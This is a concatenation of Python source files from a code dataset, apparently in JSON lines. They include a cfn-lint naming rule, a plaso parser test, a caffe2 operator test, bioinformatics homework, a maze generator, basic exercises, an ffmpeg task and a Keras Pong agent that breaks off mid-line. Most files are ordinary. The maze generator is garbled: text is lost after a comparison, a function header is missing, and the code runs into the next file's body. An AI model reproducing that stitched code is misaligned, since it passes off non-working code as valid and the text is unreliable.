All Rights Reserved.\r\nSPDX-License-Identifier: MIT-0\r\n\"\"\"\r\nimport re\r\nfrom cfnlint.rules import CloudFormationLintRule\r\nfrom cfnlint.rules import RuleMatch\r\n\r\n\r\nclass ResourceNameStyle(CloudFormationLintRule):\r\n \"\"\"Check if Resources follow style guide\"\"\"\r\n id = 'E9400'\r\n shortdesc = 'Resource names follow proper structure'\r\n description = 'Resources begin with a lowercase \\'r\\' and are in rCamelCase'\r\n source_url = ''\r\n tags = ['resources']\r\n\r\n def match(self, cfn):\r\n \"\"\"Check CloudFormation Resources\"\"\"\r\n\r\n matches = []\r\n pattern = re.compile(\"^([r][A-Z_0-9]+[a-zA-Z0-9]*)+$\")\r\n resources = cfn.template.get('Resources', {})\r\n if resources:\r\n for resourcename, val in resources.items():\r\n if not pattern.match(resourcename):\r\n message = 'Resource {0} should begin with a lowercase \\'r\\' and follow rCamelCase'\r\n matches.append(RuleMatch(\r\n ['Resources', resourcename],\r\n message.format(resourcename)\r\n ))\r\n return matches\r\n","sub_path":"src/cfnlint/rules/custom/ResourceNameStyle.py","file_name":"ResourceNameStyle.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"380052969","text":"#importing math\nimport math\n\n#defining pythagorean theorem function\ndef pythagorean_theorem(side_a, side_b):\n hypotenuse = math.sqrt(side_a**2 + side_b**2)\n return hypotenuse\n\n#receiving input from user\nside_a = input(\"Please input Side A: \")\nif side_a.isalpha() == True:\n print(\"Please input a positive number.\")\n exit()\nelif float(side_a) <= 0:\n print(\"Please input a positive number.\")\n exit()\nelse:\n side_a = float(side_a)\n\nside_b = input(\"Please input Side B: \")\nif side_b.isalpha() == True:\n print(\"Please input a positive number.\")\n exit()\nelif float(side_b) <= 0:\n print(\"Please input a positive number.\")\n exit()\nelse:\n side_b = float(side_b)\n\n#printing result\nprint(\"The hypotenuse is\", str(pythagorean_theorem(side_a, side_b)), \"units long.\")\n\n","sub_path":"Compute_the_Hypotenuse.py","file_name":"Compute_the_Hypotenuse.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"290278653","text":"#!/usr/bin/python\n# -*_ coding: utf-8 -*-\n\"\"\"Tests for the Zsh extended_history parser.\"\"\"\nimport unittest\n\nfrom plaso.lib import timelib\nfrom plaso.parsers import zsh_extended_history\nfrom tests.parsers import test_lib\n\n\nclass ZshExtendedHistoryTest(test_lib.ParserTestCase):\n \"\"\"Tests for the Zsh extended_history parser.\"\"\"\n\n def setUp(self):\n \"\"\"Makes preparations before running an individual test.\"\"\"\n self._parser = zsh_extended_history.ZshExtendedHistoryParser()\n\n def testParse(self):\n \"\"\"Tests for the Parse method.\"\"\"\n test_file = self._GetTestFilePath([u'zsh_extended_history.txt'])\n event_queue_consumer = self._ParseFile(self._parser, test_file)\n event_objects = self._GetEventObjectsFromQueue(event_queue_consumer)\n\n self.assertEqual(len(event_objects), 4)\n\n event = event_objects[0]\n expected_timestamp = timelib.Timestamp.CopyFromString(\n u'2016-03-12 08:26:50')\n self.assertEqual(event.timestamp, expected_timestamp)\n self.assertEqual(event.elapsed_seconds, 0)\n self.assertEqual(event.command, u'cd plaso')\n\n event = event_objects[2]\n expected_timestamp = timelib.Timestamp.CopyFromString(\n u'2016-03-26 11:54:53')\n expected_command = u'echo dfgdfg 
\\\\\\\\\\n& touch /tmp/afile'\n self.assertEqual(event.timestamp, expected_timestamp)\n self.assertEqual(event.command, expected_command)\n\n event = event_objects[3]\n expected_timestamp = timelib.Timestamp.CopyFromString(\n u'2016-03-26 11:54:57')\n self.assertEqual(event.timestamp, expected_timestamp)\n\n def testVerification(self):\n \"\"\"Tests for the VerifyStructure method\"\"\"\n mediator = None\n valid_lines = u': 1457771210:0;cd plaso'\n self.assertTrue(self._parser.VerifyStructure(mediator, valid_lines))\n\n invalid_lines = u': 2016-03-26 11:54:53;0;cd plaso'\n self.assertFalse(self._parser.VerifyStructure(mediator, invalid_lines))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/parsers/zsh_extended_history.py","file_name":"zsh_extended_history.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"632811381","text":"# Copyright (c) 2016-present, Facebook, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n##############################################################################\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom caffe2.python import core\nfrom hypothesis import given\nimport caffe2.python.hypothesis_test_util as hu\nimport hypothesis.strategies as st\nimport numpy as np\n\n\ndef calculate_ap(predictions, labels):\n N, D = predictions.shape\n ap = np.zeros(D)\n num_range = np.arange((N), dtype=np.float32) + 1\n for k in range(D):\n scores = predictions[:N, k]\n label = labels[:N, k]\n sortind = np.argsort(-scores, kind='mergesort')\n truth = label[sortind]\n precision = np.cumsum(truth) / num_range\n ap[k] = precision[truth.astype(np.bool)].sum() / max(1, truth.sum())\n return ap\n\n\nclass TestAPMeterOps(hu.HypothesisTestCase):\n @given(predictions=hu.arrays(dims=[10, 3],\n elements=st.floats(allow_nan=False,\n allow_infinity=False,\n min_value=0.1,\n max_value=1)),\n labels=hu.arrays(dims=[10, 3],\n dtype=np.int32,\n elements=st.integers(min_value=0,\n max_value=1)),\n **hu.gcs_cpu_only)\n def test_average_precision(self, predictions, labels, gc, dc):\n op = core.CreateOperator(\n \"APMeter\",\n [\"predictions\", \"labels\"],\n [\"AP\"],\n buffer_size=10,\n )\n\n def op_ref(predictions, labels):\n ap = calculate_ap(predictions, labels)\n return (ap, )\n\n self.assertReferenceChecks(\n device_option=gc,\n op=op,\n inputs=[predictions, labels],\n reference=op_ref)\n\n @given(predictions=hu.arrays(dims=[10, 3],\n elements=st.floats(allow_nan=False,\n allow_infinity=False,\n min_value=0.1,\n max_value=1)),\n labels=hu.arrays(dims=[10, 3],\n dtype=np.int32,\n elements=st.integers(min_value=0,\n max_value=1)),\n **hu.gcs_cpu_only)\n def test_average_precision_small_buffer(self, predictions, labels, gc, dc):\n op_small_buffer = core.CreateOperator(\n \"APMeter\",\n [\"predictions\", \"labels\"],\n [\"AP\"],\n buffer_size=5,\n )\n\n 
def op_ref(predictions, labels):\n            # We can only hold the last 5 in the buffer\n            ap = calculate_ap(predictions[5:], labels[5:])\n            return (ap, )\n\n        self.assertReferenceChecks(\n            device_option=gc,\n            op=op_small_buffer,\n            inputs=[predictions, labels],\n            reference=op_ref\n        )\n","sub_path":"caffe2/python/operator_test/apmeter_test.py","file_name":"apmeter_test.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"518750038","text":"def f(a, b):\n    return a + b\n\n\ndef dict_interdiff(d1, d2):\n    '''\n    d1, d2: dicts whose keys and values are integers\n    Returns a tuple of dictionaries according to the instructions above\n    Write a function called dict_interdiff that takes in two dictionaries (d1 and d2).\n    The function will return a tuple of two dictionaries:\n    a dictionary of the intersect of d1 and d2 and a dictionary of the difference of d1 and d2,\n    calculated as follows:\n\n    intersect: The keys to the intersect dictionary are keys that are common in both d1 and d2.\n    To get the values of the intersect dictionary,\n    look at the common keys in d1 and d2 and apply the function f to these keys' values --\n    the value of the common key in d1 is the first parameter to the function and the value of\n    the common key in d2 is the second parameter to the function. Do not implement f inside your\n    dict_interdiff code -- assume it is defined outside.\n    difference: a key-value pair in the difference dictionary is (a) every key-value pair in d1\n    whose key appears only in d1 and not in d2 or (b) every key-value pair in d2 whose key appears\n    only in d2 and not in d1.\n    '''\n    intersection = {}\n    difference = {}\n    for key, value in d1.items():\n        if key in d2:\n            # common key: combine the two values with f\n            intersection[key] = f(value, d2[key])\n        else:\n            difference[key] = value\n    for key, value in d2.items():\n        if key not in d1:\n            difference[key] = value\n    return (intersection, difference)
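\n\n# Worked example (illustrative, not part of the original submission): with f(a, b) = a + b\n# as defined above, dict_interdiff({1: 30, 2: 20}, {1: 40, 3: 50}) returns\n# ({1: 70}, {2: 20, 3: 50}).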
","sub_path":"Quiz/prob7.py","file_name":"prob7.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"568535586","text":"\"\"\"\nTask 1\n\n0) Review the biology concepts (DNA, RNA, nucleotide, protein, codon)\n\n1) Build statistics of the nucleotides occurring in the DNA sequence\nof each gene (for example: [A - 46, C - 66, G - 23, T - 34])\n\n2) Translate the DNA sequence into RNA (OK, Google)\n\n3) Translate the RNA sequence into a protein*\n\n\n*In the files folder you will find the file rna_codon_table.txt -\nit contains the table that maps RNA codons to the amino acids\nmaking up a polypeptide chain of a protein.\n\n\nInput: the file dna.fasta with n genes\n\nOutput - 3 files:\n - statistics of the nucleotide counts in the DNA\n - the RNA sequence for each gene\n - the codon sequence for each gene\n\n ** If you know matplotlib/seaborn or the like, you are welcome\n to earn extra points for histograms of the nucleotide statistics.\n (Do not forget to label the axes)\n\nP.S. Leaving a file descriptor unclosed will be penalized.\n\"\"\"\n\nimport json\nimport matplotlib.pyplot as plt\n\n\nwith open(\"./files/rna_codon_table.txt\", \"r\") as rna_codon_table_file:\n    name_genom = None\n    key = False\n    condon_dict = {}\n\n    for line in rna_codon_table_file:\n        for item in line.split():\n            if key:\n                condon_dict[key] = item\n                key = False\n            else:\n                key = item\n\n\ndef count_nucleotides(dna: dict):\n\n    DNA_symbols = ('A', 'C', 'G', 'T')\n    dna_stat = {}\n\n    for key, value in dna.items():\n        dna_stat[key] = [(DNA_symbol, value.count(DNA_symbol)) for DNA_symbol in DNA_symbols]\n    return dna_stat\n\n\ndef my_replace(s: str, old, new):\n\n    return new.join(s.split(old))\n\n\ndef translate_from_dna_to_rna(dna: dict):\n\n    rna = {}\n    for key, value in dna.items():\n        rna_value = my_replace(value, 'T', 'U')\n        rna[key] = rna_value[:(len(rna_value)//3) * 3]\n    return rna\n\n\ndef rna_to_protein(rna_str: str):\n\n    global condon_dict\n    i = 0\n    res = ''\n    while i != len(rna_str):\n        res += condon_dict[rna_str[i:i+3]]\n        i += 3\n    return res\n\n\ndef translate_rna_to_protein(rna):\n\n    protein = {}\n    for key, value in rna.items():\n        protein[key] = rna_to_protein(value)\n    return protein\n\n\nif __name__ == '__main__':\n\n    dna = {}\n    with open(\"./files/dna.fasta\", \"r\") as dna_file:\n        name_genom = None\n        for line in dna_file:\n            if line[0] == '>':\n                name_genom = line.replace('\\n', '')\n                dna[name_genom] = ''\n            else:\n                dna[name_genom] += line.replace('\\n', '')\n\n    dna_stat = count_nucleotides(dna)\n    list_data = [('A', 217), ('C', 409), ('G', 373), ('T', 232)]\n\n    for key, value in dna_stat.items():\n        plt.figure()\n        plt.bar([val[0] for val in value], [val[1] for val in value])\n        plt.title(key)\n        plt.xlabel('Nucleotide')\n        plt.ylabel('Frequency')\n        plt.savefig(str(key)+'.png')\n\n\n    rna = translate_from_dna_to_rna(dna)\n    protein = translate_rna_to_protein(rna)\n\n    with open('dna_stat.json', 'w') as file:\n        json.dump(dna_stat, file, indent=4)\n    with open('rna.json', 'w') as file:\n        json.dump(rna, file, indent=4)\n    with open('protein.json', 'w') as file:\n        json.dump(protein, file, indent=4)\n","sub_path":"homework_strings.py","file_name":"homework_strings.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"488988729","text":"from tkinter import *\nfrom tkinter import messagebox as tkMessageBox, filedialog\nfrom take_image import take_image\nfrom add_camera import check_existance, create_CameraInfo_file, return_camera_list, read_camera_info_file, check_roi_image_existance, save_roi_info\nfrom video_analysis import VideoAnalysis\nfrom region_select import region_select\nimport os\nimport json\nimport cv2\n\nMode = \"video\"; roi_image_checker = 0\n\n\ndef add_camera():\n\tvalue1 = addr.get()\n\tvalue2 = passw.get()\n\tif check_existance(value1):\n\t\ttkMessageBox.showinfo(\"existed\", \"The camera already exists.\")\n\telse:\n\t\tanswer = tkMessageBox.askquestion(\"Delete\", \"Double check your camera information!!\", icon='warning')\n\t\tif answer == 'yes':\n\t\t\tcreate_CameraInfo_file(value1, value2)\n\t\t\tprint(\"new camera added!\")\n\t\telse:\n\t\t\tprint(\"I'm Not Deleted Yet\")\n\ndef create_cameralist_window():\n\twindow = Toplevel(secondFrame)\n\tcamera_list = return_camera_list()\n\n\tfor idx, camera_ip in enumerate(camera_list):\n\t\tb = Button(window, text=camera_ip, command= lambda camera_ip = camera_ip: create_taking_window(camera_ip))\n\t\tb.grid(row=idx, column=0)\n\n\n\tdef 
create_taking_window(camera_ip):\n\t\tglobal roi_image_checker\n\t\t#video_default_setting\n\t\tpath = os.getcwd() + '/Cameras/' + camera_ip\n\t\tcamera_info = read_camera_info_file(camera_ip)\n\t\tdef check_roi_image_existance(ip):\n\t\t\tCamera_path = os.getcwd() + '/Cameras/' + ip\n\t\t\tchecker = []\n\t\t\tfor File in os.listdir(Camera_path):\n\t\t\t\t# print(File)\n\t\t\t\tif File.endswith('.jpg'):\n\t\t\t\t\tchecker.append(File)\n\t\t\treturn len(checker)\n\t\troi_image_checker = check_roi_image_existance(camera_ip)\n\n\n\t\tdef mode_switch_toggle():\n\t\t\tglobal Mode\n\t\t\tif t_btn.config('text')[-1] == 'video':\n\t\t\t\tt_btn.config(text='photo')\n\t\t\t\tMode = \"photo\"\n\t\t\telse:\n\t\t\t\tt_btn.config(text='video')\n\t\t\t\tMode = \"video\"\n\n\n\t\tdef update_video_duration():\n\t\t\tnew_time = [0,0,0]\n\t\t\th = time1.get()\n\t\t\tm = time2.get()\n\t\t\ts = time3.get()\n\n\t\t\tif Mode == 'photo':\n\t\t\t\ttime = 'N/A'\n\t\t\telse:\n\t\t\t\tif not h:\n\t\t\t\t\tnew_time[0] = '00'\n\t\t\t\tif h:\n\t\t\t\t\tnew_time[0] = str(h).zfill(2)\n\t\t\t\tif not m:\n\t\t\t\t\tnew_time[1] = '00'\n\t\t\t\tif m:\n\t\t\t\t\tnew_time[1] = str(m).zfill(2)\n\t\t\t\tif not s:\n\t\t\t\t\tnew_time[2] = '00'\n\t\t\t\tif s:\n\t\t\t\t\tnew_time[2] = str(s).zfill(2)\n\n\t\t\tjson_file_path = \"./Cameras/\" + camera_ip + \"/\" + camera_ip + \"_metadata.json\"\n\t\t\t# password\n\t\t\twith open(json_file_path, \"r\") as json_file:\n\t\t\t\tjson_data = json.load(json_file)\n\t\t\t\ttmp = json_data[\"video_length\"]\n\t\t\t\tjson_data[\"video_length\"] = new_time\n\n\t\t\twith open(json_file_path, \"w\") as json_file:\n\t\t\t\tjson.dump(json_data, json_file)\n\n\n\t\tdef get_video_image_taking():\n\t\t\tjson_file_path = \"./Cameras/\" + camera_ip + \"/\" + camera_ip + \"_metadata.json\"\n\t\t\t# password\n\t\t\twith open(json_file_path, \"r\") as json_file:\n\t\t\t\tjson_data = json.load(json_file)\n\t\t\t\tduration = json_data[\"video_length\"]\n\n\t\t\ttake_image(camera_ip, camera_info[\"password\"], os.getcwd() + '/Cameras/' + camera_ip, '1280x720', '30',\n\t\t\t\t\t duration[0] + ':' + duration[1] + ':' + duration[2], Mode)\n\n\t\tcamera_info_window = Toplevel(window)\n\n\t\tt_btn = Button(camera_info_window, text=\"video\", width=12, command=mode_switch_toggle)\n\t\tt_btn.grid(row=3, column=0)\n\n\n\t\timage_taking = Button(camera_info_window, text='taking', width=12, command=get_video_image_taking)\n\t\timage_taking.grid(row=5, column=0)\n\n\t\tdef create_analysis_window():\n\t\t\tana_window = Toplevel(camera_info_window)\n\n\t\t\tdef update_resolution():\n\t\t\t\tvalue = resolution_options[choice.get()]\n\t\t\t\tlabel_reso.config(text=(str(value[0]) + ' x ' + str(value[1])))\n\t\t\t\tjson_file_path = \"./Cameras/\" + camera_ip + \"/\" + camera_ip + \"_metadata.json\"\n\t\t\t\t# password\n\t\t\t\twith open(json_file_path, \"r\") as json_file:\n\t\t\t\t\tjson_data = json.load(json_file)\n\t\t\t\t\ttmp = json_data[\"resolution\"]\n\t\t\t\t\tjson_data[\"resolution\"] = value\n\n\t\t\t\twith open(json_file_path, \"w\") as json_file:\n\t\t\t\t\tjson.dump(json_data, json_file)\n\n\t\t\tdef update_frame_rate():\n\t\t\t\tvalue = fr_options[choice_fr.get()]\n\t\t\t\tlabel_fr.config(text=(value))\n\t\t\t\tjson_file_path = \"./Cameras/\" + camera_ip + \"/\" + camera_ip + \"_metadata.json\"\n\t\t\t\t# password\n\t\t\t\twith open(json_file_path, \"r\") as json_file:\n\t\t\t\t\tjson_data = json.load(json_file)\n\t\t\t\t\ttmp = json_data[\"frame_rate\"]\n\t\t\t\t\tjson_data[\"frame_rate\"] = value\n\n\t\t\t\twith 
open(json_file_path, \"w\") as json_file:\n\t\t\t\t\tjson.dump(json_data, json_file)\n\n\t\t\tdef anay_video():\n\t\t\t\tin_path = filedialog.askopenfilename(initialdir= \"./Cameras/\" + camera_ip + \"/Videos\")\n\t\t\t\tout_path = \"./Cameras/\" + camera_ip + \"/Videos\" + '/out_temp.mp4'\n\t\t\t\tjson_file_path = \"./Cameras/\" + camera_ip + \"/\" + camera_ip + \"_metadata.json\"\n\t\t\t\t# password\n\t\t\t\twith open(json_file_path, \"r\") as json_file:\n\t\t\t\t\tjson_data = json.load(json_file)\n\n\t\t\t\tcap = cv2.VideoCapture(in_path)\n\t\t\t\tflag, frame = cap.read()\n\t\t\t\tcv2.imwrite('./Cameras/' + camera_ip + '/temp.jpg', frame)\n\t\t\t\tori_reso = (frame.shape[1], frame.shape[0])\n\t\t\t\tx, _ = region_select(camera_ip)\n\t\t\t\tos.remove('./Cameras/' + camera_ip + '/temp.jpg')\n\n\t\t\t\tVA = VideoAnalysis(in_path, out_path, json_data['resolution'], ori_reso, 30, json_data['frame_rate'],\n\t\t\t\t\t\t\t\t sorted_refPt=x)\n\t\t\t\tVA.mask_video()\n\t\t\t\tarr = VA.mask_rcnn_apply()\n\t\t\t\tinterested_frame = VA.find_interested_frames(arr, 2)\n\t\t\t\tVA.clip_video(interested_frame)\n\n\t\t\t# resolution option menu\n\t\t\tresolution_options = {'high': (1280,720), 'median': (800,600), 'low': (640,400)}\n\t\t\tchoice = StringVar()\n\t\t\tchoice.set(\"high\") # default value, to use value: choice.get()\n\t\t\tLabel(ana_window, text='resolution').grid(row=1)\n\t\t\tpopupChoice = OptionMenu(ana_window, choice, *resolution_options, command=lambda x:update_resolution())\n\t\t\tpopupChoice.grid(row=1, column=1)\n\t\t\tlabel_reso = Label(ana_window, text=str(resolution_options[choice.get()][0])+' x '+str(resolution_options[choice.get()][1]))\n\t\t\tlabel_reso.grid(row=1, column=2)\n\n\t\t\tfr_options = {'5': 5, '2': 2, '1': 1}\n\t\t\tchoice_fr = StringVar()\n\t\t\tchoice_fr.set(\"1\") # default value, to use value: choice.get()\n\t\t\tLabel(ana_window, text='framerate').grid(row=2)\n\t\t\tpopupChoice = OptionMenu(ana_window, choice_fr, *fr_options, command=lambda x:update_frame_rate())\n\t\t\tpopupChoice.grid(row=2, column=1)\n\t\t\tlabel_fr = Label(ana_window, text=fr_options[choice_fr.get()])\n\t\t\tlabel_fr.grid(row=2, column=2)\n\n\t\t\tana_butt = Button(ana_window, text='process video', command=anay_video)\n\t\t\tana_butt.grid(row=3, column=0)\n\n\n\t\ttime_label = Label(camera_info_window, text='video time').grid(row=0)\n\t\tt1 = StringVar()\n\t\ttime1 = Entry(camera_info_window, textvariable=t1,width=5)\n\t\ttime1.grid(row=0, column=1) # grid is more useful for more customization\n\t\tlabel1 = Label(camera_info_window, text=':').grid(row=0, column=2)\n\t\tif roi_image_checker > 0:\n\t\t\ttime1.config(state = NORMAL)\n\t\telse:\n\t\t\ttime1.config(state = DISABLED)\n\n\t\tt2 = StringVar()\n\t\ttime2 = Entry(camera_info_window, textvariable=t2,width=5)\n\t\ttime2.grid(row=0, column=3) # grid is more useful for more customization\n\t\tlabel2 = Label(camera_info_window, text=':').grid(row=0, column=4)\n\t\tif roi_image_checker > 0:\n\t\t\ttime2.config(state = NORMAL)\n\t\telse:\n\t\t\ttime2.config(state = DISABLED)\n\n\t\tt3 = StringVar()\n\t\ttime3 = Entry(camera_info_window, textvariable=t3, width=5)\n\t\ttime3.grid(row=0, column=5) # grid is more useful for more customization\n\t\tif roi_image_checker > 0:\n\t\t\ttime3.config(state = NORMAL)\n\t\telse:\n\t\t\ttime3.config(state = DISABLED)\n\n\t\tadd_ip_info = Button(camera_info_window, command=update_video_duration, text='update_time')\n\t\tadd_ip_info.grid(row=0, column=6)\n\n\t\troi_taking = Button(camera_info_window, 
text='roi_taking', command=lambda:save_roi_info(camera_ip))\n\t\troi_taking.grid(row=4, column=0)\n\t\tif roi_image_checker > 0:\n\t\t\troi_taking.config(state = NORMAL)\n\t\telse:\n\t\t\troi_taking.config(state = DISABLED)\n\n\t\tana_butt = Button(camera_info_window, text='analysis video', command=create_analysis_window)\n\t\tana_butt.grid(row=4, column=1)\n\n\n\nsecondFrame = Tk()\n# entry for value\naddr = StringVar()\nip_address = Entry(secondFrame, textvariable=addr).grid(row=0, column=1) # grid is more useful for more customization\nip_label = Label(secondFrame, text='ip').grid(row=0)\n\npassw = StringVar()\nip_password = Entry(secondFrame, textvariable=passw).grid(row=1, column=1) # grid is more useful for more customization\npassw_label = Label(secondFrame, text='password').grid(row=1)\n\n\nadd_ip_info = Button(secondFrame, command=add_camera, text='add').grid(row=0, column=2)\n\n# label showing result or other text\n\n\nb = Button(secondFrame, text=\"check existed cameras\", command=create_cameralist_window).grid(row=1, column=2)\n\n\n\nsecondFrame.mainloop()","sub_path":"Mask-RCNN/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":8504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"253491133","text":"# mazeGenerator.py includes functions directly related to the maze\n# need random number generator for obstacleDensity\nfrom random import random\nfrom random import randint\n\n# grid is just list of ints, if 0 then the grid is free, if 1 then its blocked, if -1 then it is on fire\n#if the entry is 2, then the agent is present\n\n\n# just populates a maze based on dimension and obstacleDensity\n# if dim<2 then exception raised\n# obstacleDensity is a probability from 0 to 1, if anything else inputted, then exception is raised\n\n\ndef generateMaze(dim, obstacleDensity):\n    if dim<2:\n        raise ValueError(\"Dimension cannot be less than 2!\")\n    if obstacleDensity<0 or obstacleDensity>1:\n        raise ValueError(\"Blocking factor must be a probability from 0 to 1!\")\n    # so far we passed checks, so generating list\n    maze=[]\n    for i in range(dim):\n        toAdd=[]\n        for j in range(dim):\n            if i==0 and j==0:\n                # top left corner is the start\n                toAdd.append(0)\n            elif i==dim-1 and j==dim-1:\n                # bottom right corner is the end\n                toAdd.append(0)\n            else:\n                # generating random number for obstacleDensity probability\n                randomNumber = random()\n                if randomNumber < obstacleDensity:\n                    toAdd.append(1)\n                else:\n                    toAdd.append(0)\n        maze.append(toAdd)\n    return maze\n\n\n# NOTE: a span of this file was lost when markup was stripped from the dump (everything\n# between the obstacle check above and the flammability check below, including the def\n# line of the fire-spread function). The function name and signature below are\n# reconstructed from usage and are assumptions.\ndef advanceFire(maze, dim, flammabilityRate):\n    if flammabilityRate<0 or flammabilityRate>1:\n        raise ValueError(\"Flammability rate must be between 0 and 1 (inclusive)!\")\n    # iterating and adjusting fire\n    for i in range(dim):\n        for j in range(dim):\n            if maze[i][j]!=1 and maze[i][j]!=-1:\n                # then I need to check neighbors\n                neighbors = []\n                numFire=0\n                neighbors.append((i+1, j))\n                neighbors.append((i-1, j))\n                neighbors.append((i, j+1))\n                neighbors.append((i, j-1))\n                for neighbor in neighbors:\n                    if neighbor[0]<dim and neighbor[0]>=0 and neighbor[1]<dim and neighbor[1]>=0:\n                        # then this is valid neighbor to check\n                        if maze[neighbor[0]][neighbor[1]]==-1:\n                            numFire += 1\n                probFire = 1-((1-flammabilityRate)**numFire)\n                if random() < probFire:\n                    maze[i][j] = -1  # reconstructed from context: ignite this cell\n    return maze
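\n\n# Worked example of the ignition probability above (illustrative): with\n# flammabilityRate = 0.5 and numFire = 2 burning neighbours,\n# probFire = 1 - (1 - 0.5)**2 = 0.75.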
\n\n# [lost in extraction: the closing metadata of the maze record and the header of the\n# following record, a Python-basics exercise (its metadata below names it Python1/LIST.py);\n# the fragment resumes mid-comparison]\nif b > a:  # the assignments of a and b before this line were lost\n    print(\" b is greater than a \")\n\n# python elif statement\na = 45\nb = 77\nif b > a:\n    print(\"b is greater than a\")\nelif a == b:\n    print(\"a and b are equal\")\n\n# python while loops\ni = 0\nwhile i <= 100:\n    i = i + 1\n    print(i)\n\n# Program to find the sum of all numbers stored in a list\n\n# List of numbers\nnumbers = [6, 5, 3, 8, 4, 2, 5, 4, 11]\n\n# variable to store the sum\nsum = 0\n\n# iterate over the list\nfor val in numbers:\n    sum = sum + val\n\nprint(\"The sum is\", sum)\n\n\n# Creating a function\ndef my_function():\n    print(\"Print hello from a function \")\n\nmy_function()\n\n\ndef my_names(fname):\n    print(fname + \" Omondi\")\n\nmy_names(\"Felix\")\nmy_names(\"Vincent\")\nmy_names(\"Erick\")\n","sub_path":"Python1/LIST.py","file_name":"LIST.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"349688035","text":"import sys\nimport ffmpeg\n\nfrom libs.task import task\n\nvalidator = {\n    'input': {\n        'type': str,\n        'required': True,\n        'help': 'Input file path',\n    },\n    'output': {\n        'type': str,\n        'required': True,\n        'help': 'Output file path',\n    },\n}\n\n\n@task(\n    name='transcoding',\n    title='Transcode video from mov to mp4',\n    validator=validator\n)\ndef transcoding(input, output):\n    try:\n        (ffmpeg\n            .input(input)\n            .output(output, vcodec='copy', acodec='copy')\n            .overwrite_output()\n            .run()\n        )\n        return output\n    except ffmpeg.Error as e:\n        print(e.stderr.decode(), file=sys.stderr)\n        sys.exit(1)\n","sub_path":"tasks/transcoding.py","file_name":"transcoding.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"245633964","text":"from agent_dir.agent import Agent\nimport scipy\nimport numpy as np\n#import matplotlib.pyplot as plt\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Reshape, Flatten, Input\nfrom keras.optimizers import RMSprop\nfrom keras.layers.convolutional import Conv2D\n\nimport tensorflow as tf\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsession = tf.Session(config=config) \n\ndef prepro(o,image_size=[80,80]):\n    \"\"\"\n    Call this function to preprocess RGB image to grayscale image if necessary\n    This preprocessing code is from\n    https://github.com/hiwonjoon/tf-a3c-gpu/blob/master/async_agent.py\n    \n    Input: \n    RGB image: np.array\n        RGB screen of game, shape: (210, 160, 3)\n    Default return: np.array \n        Grayscale image, shape: (80, 80, 1)\n    \n    \"\"\"\n    y = 0.2126 * o[:, :, 0] + 0.7152 * o[:, :, 1] + 0.0722 * o[:, :, 2]\n    y = y.astype(np.uint8)\n    resized = scipy.misc.imresize(y, image_size)\n    return np.expand_dims(resized.astype(np.float32),axis=2)\n\ndef preprocess_frame(I):\n    I = I[35:195] # crop\n    #I = I[::2, ::2, 0] # downsample by factor 2\n    I = 0.2126 * I[::2, ::2, 0] + 0.7152 * I[::2, ::2, 1] + 0.0722 * I[::2, ::2, 2]\n    I[I == 144] = 0 # remove bg\n    I[I == 109] = 0\n    #I[I != 0] = 1\n    return np.expand_dims(I.astype(np.float),axis=0)\n\nclass Agent_PG(Agent):\n    def __init__(self, env, args):\n        \"\"\"\n        Initialize everything you need here.\n        For example: building your model\n        \"\"\"\n\n        super(Agent_PG,self).__init__(env)\n\n        ##################\n        # YOUR CODE HERE #\n        ##################\n        self.env = env\n        self.state_size = [1, 80, 80]\n        self.action_size = env.get_action_space().n\n        self.gamma = 0.99\n        self.learning_rate = 0.001\n        self.states = []\n        self.gradients = []\n        self.rewards = []\n        self.probabilities = []\n        self.scores = []\n        #self.model = self._build_model()\n        if args.test_pg:\n            #you can load your model here\n            print('loading trained model')\n            self.model = keras.models.load_model('./save_model/pong.h5')\n        else:\n            self.model = self._build_model()\n            self.model.save('./save_model/pong.h5')\n        self.model.summary()\n\n\n    def _build_model(self):\n        model = Sequential()\n        model.add(Reshape((1,80,80),input_shape=(1,80,80))) # wrong\n        # add more conv2d v0.1.1\n        model.add(Conv2D(16, 
